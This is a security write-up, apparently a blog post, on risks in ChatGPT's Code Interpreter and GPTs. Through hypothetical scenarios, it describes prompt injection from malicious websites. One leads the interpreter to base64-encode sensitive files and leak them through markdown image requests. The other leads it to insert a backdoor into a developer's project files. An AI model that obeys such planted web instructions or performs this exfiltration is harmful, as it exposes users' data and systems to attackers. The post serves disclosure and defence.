GPTs and Assistants API: Data Exfiltration and Backdoor Risks in Code Interpreter

OpenAI DevDay, in San Francisco. “You can build a GPT—a customized version of ChatGPT—for almost anything,” Sam Altman, OpenAI’s CEO, said at the event.

The update released by OpenAI introduces significant innovations and conveniences through customized ChatGPT versions (GPTs) and the Assistants API.

Let's take a closer look at the details of these innovations and their potential impacts:

- One of the most important uses of GPTs is the ability to create your own GPT without needing coding skills.
- The previously separate Python sandbox and browsing features now work interactively together.

Considering all these aspects, it seems that these features will lead to significant production due to the conveniences they provide. Moreover, potential security issues that may arise could affect large populations.

Some security issues I have observed are:

The Code Interpreter in OpenAI's ChatGPT is an innovative feature that elevates the AI model's interactivity. It is specifically created to execute Python code within a controlled environment and deliver immediate output, making it a potent resource for various purposes, including mathematical calculations, data analysis, code experimentation, and interactive Python programming education.

- Exfiltration of sensitive files from within the Code Interpreter.
- Inserting a backdoor into the Code Interpreter.

To strengthen the narrative, I tried to create a hypothetical scenario using TinyAI to illustrate the two main security risks.Imagine a developer named Alex who is using OpenAI's new features to automating some of their daily tasks. Alex often uses the Code Interpreter, which allows them to execute Python code directly within the chat interface.

Scenario-1 : A Developer Using OpenAI's Code Interpreter

Situation: Alex is testing the Code Interpreter's ability to fetch data from the web. So He navigates to different websites and scrape content. While testing, Alex unknowingly navigates to a malicious website that has been compromised to exploit the Code Interpreter.

Exfiltration Process: The malicious website contains a malicious script that is designed to search for sensitive files where Alex's Code Interpreter is running. The malicious prompt finds a file with sensitive information and uses base64 encoding to convert the file's contents into a string. This string is then embedded into a markdown image tag or any other markdown element that is designed to make a web request. When the Code Interpreter fetches the markdown content, it sends the base64-encoded string to the attacker's server disguised as a request for an image or another resource.

Figure-1 : Navigate a malicious website and exfiltrate data using markdown.


Figure-2 : Obtaining sensitive data via GET request.

Scenario-2 : Code Interpreter Backdoor:

Situation: Alex is working on a web development project and uses the Code Interpreter to check their HTML and JavaScript code snippets. They visit another website to get some inspiration for their project.

Backdoor Creation:The website Alex visits is malicious and contains malicious prompt that is crafted to exploit the Code Interpreter. When Alex's Code Interpreter executes the snippet from the website, the malicious JavaScript code injects a backdoor into Alex's project files.

This backdoor could manifest as a simple script that sends data to the attacker's server or allows the attacker to execute commands on the server hosting Alex's project.

Outcome: The attacker now has a way to remotely control or access Alex's project server, potentially leading to data theft, further injection of malware, or even a full-blown attack on the server's infrastructure.

Figure-3 : Add malicious content to an existing html file.


Reference(s)

https://github.com/VolkanSah/The-Code-Interpreter-in-OpenAI-ChatGPT

Timeline

2023-11-12 - v1.0

2023-11-12 - v1.1

2023-11-13 - v1.2